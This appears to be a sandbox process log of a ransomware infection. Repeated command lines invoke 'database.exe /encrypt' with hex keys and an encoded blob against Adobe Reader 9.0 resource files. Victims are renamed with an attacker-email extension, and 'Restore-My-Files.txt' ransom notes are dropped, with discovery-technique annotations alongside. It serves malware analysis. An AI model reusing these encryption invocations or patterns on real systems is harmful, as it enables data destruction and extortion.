C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6508
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6472
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:6112
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5968
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:1944
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\Restore-My-Files.txt"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5684
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6740
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2940
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5044
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:3916
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2116
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4660
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6744
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5536
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4424
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:3228
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2384
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT.id-DA208E5B.[[email protected]].gamma.gif"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2728
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\Restore-My-Files.txt"5⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2944
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\abcpy.ini.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6732
-
-
C:\Windows\SysWOW64\shell.exe"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AcroRead.msi.id-DA208E5B.[[email protected]].gamma.gif"5⤵PID:6760
-
-
